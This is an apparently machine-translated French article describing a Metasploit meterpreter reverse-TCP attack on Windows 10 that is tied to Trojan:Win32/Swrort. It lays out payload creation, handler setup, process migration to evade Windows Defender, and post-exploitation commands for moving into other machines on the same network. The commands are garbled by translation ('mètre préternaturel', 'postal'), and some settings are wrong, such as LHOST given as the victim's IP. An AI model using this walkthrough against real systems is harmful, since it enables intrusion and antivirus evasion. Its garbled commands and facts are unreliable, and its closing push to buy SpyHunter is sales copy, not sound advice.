Nom | Troyen:Win32 / Swrort |
Type | Troyen |
brève description | Lire et écrire des autorisations dans Windows 10. Permet à l'attaquant d'infecter d'autres PC connectés à celui infecté. |
Symptômes | Apparaissant d'un fichier .exe familier. |
Méthode de distribution | Mails de spam. Attaques MITM, redirections malveillantes. |
Outil de détection | Télécharger SpyHunter, Pour voir si votre système a été affectée par de Troie:Win32 / Swrort |
Un dangereux exploit a été découvert dans Windows 10, en utilisant un Troyen:Win32 / Swrort pour contourner Windows Defender et accéder en lecture et en écriture. Anonyme chercheur a démontré la vulnérabilité d'un canal, appelé Metasploitstation. Il montre 3 phases dans lequel vous pouvez glisser passé de Windows 10 défenses. Il n'y avait pas d'informations découvert à ce jour si cet exploit a été fixé ou pas.
Fenêtres 10 Multihandler Exploit Infection – Comment faire?
Dans la vidéo,, l'utilisateur de tech-savvy a démontré une simulation d'un fichier «123.EXE» qu'il crée et exécute comme si elle a été ouverte dans le monde réel en tant que pièce jointe à un e-mail ou exécuté par une autre méthode. Nous avons décidé de diviser le processus d'infection en trois phases pour vous aider à mieux comprendre la méthodologie.
Phase 1: Préparation des fichiers
Le pirate crée une charge utile avec cette configuration dans un environnement Linux:
→msfpaayload fenêtres / mètre préternaturel / reverse_tcp LHOST =
portnumber1 * – Ceci est le port utilisé pour l'attaque. Il peut être un port (4444, 4324, etc). Nous avons portnumber1 écrit depuis qu'il utilise un second portnumber que nous avons nommé
Après cette phase est terminée et que le fichier est créé par l'attaquant et est tombé sur le système de l'utilisateur, l'attaquant peut passer à la phase 2.
Phase 2: Utilisation de l'exploit.
À ce point, l'attaquant Multihandler utilise pour faire afficher le .exe et profiter de l'exploit pour ouvrir une session active(relier) à la victime PC.
Cela peut se produire en utilisant les lignes de commande de courant:
→msfconsole (Pour démarrer la console. Ouvre 'msf>' Interface)
Dans "msf" l'attaquant peut exécuter les commandes suivantes:
→msf> utilisation exploiter / multi / gestionnaire
set lhost 'adresse IP victime’
Set lport 'portnumber1’
Après cela, l'attaquant exécute la charge utile pour établir une session:
→msfexploit(maître)> Régler la charge utile des fenêtres / mètre préternaturel / reverse_tcp
Pour vérifier si une session active est possible, l'attaquant écrit la commande msfexploit(maître)> Afficher les options qui lui permettent de voir ce
→processus EXITFUNC oui technique de sortie(accepté: seh, fil..)
LHOST victime adresse IP oui Le port d'écoute
LPORT portnumber1 oui L'écouter adresse
Cela lui permet de voir qu'il configuré correctement les paramètres et peut procéder à l'infection réelle de l'ordinateur.
Phase 3: Infection
La commande que l'attaquant utilise pour ouvrir une session active avec la victime est 'exploit'. Après l'exécution de cette commande, le fichier '123.EXE' revint avec cette réponse:
→[*] gestionnaire inverse Démarré le
[*] Démarrage du gestionnaire de charge utile…
À ce point, l'exécutable a été lancé sur la machine Windows. En dépit du fait que le logiciel Windows Defender est en cours d'exécution, cela n'a pas empêché l'attaque. Toutefois, lorsque l'analyse antivirus, le programme antivirus de Windows immédiatement détecté "123.EXE" comme un cheval de Troie:Win32 / Swrort.A.
Pour éviter la détection, l'attaquant a utilisé une tactique, appelé migration qui a créé un fichier 'notepad.exe' qui migre de la session active de '123.EXE' à ce fichier lors de la connexion. Cela a été fait en utilisant la commande:
→mètre préternaturel> postal / windows / gérer / migrate exécuter
Après avoir migré le processus et en répétant la même simulation mais en utilisant
De là, l'attaquant a démontré complet en lecture et écrit autorisations en créant un nouveau dossier avec un nouveau document de texte. Pour autant que nous savons que les principales commandes qui peuvent être utilisées après la connexion sont:
→> Sysinfo - pour afficher la version du système et de l'information.
> dir :/
> Shell - pour afficher la version Windows et d'autres informations.
> Getwid - montre de Windows ID.
> Ps -aux - affiche tous les fichiers .exe en cours d'exécution dans le Gestionnaire des tâches de Windows.
> Ifconfig - affiche des informations sur les interfaces (adresses IP et d'autres informations). Cette commande donne à l'attaquant les informations pour se connecter à un autre ordinateur qui est dans le même NIC et VLAN avec le PC infecté. Cela peut être très dévastateur pour les réseaux domestiques ou de bureau en cas de telles attaques est bien organisé.
Fenêtres 10 Les exploits – Conclusion
Il n'y a aucune information réelle sur si oui ou non cet exploit a été fixé, mais comme avec tout autre logiciel, il peut y avoir d'autres plus à découvert. Voilà pourquoi, dans le cas où vous utilisez Windows 10, nous vous recommandons de télécharger et installer le programme de protection contre les malwares avancés. Il vous protégera et se mettre à jour régulièrement avec les dernières menaces activement. Aussi, ce programme a boucliers actifs qui détectent immédiatement les connexions non autorisées.
Spy Hunter scanner ne détecte que la menace. Si vous voulez que la menace d'être retiré automatiquement, vous devez acheter la version complète de l'outil anti-malware.En savoir plus sur l'outil SpyHunter Anti-Malware / Comment désinstaller SpyHunter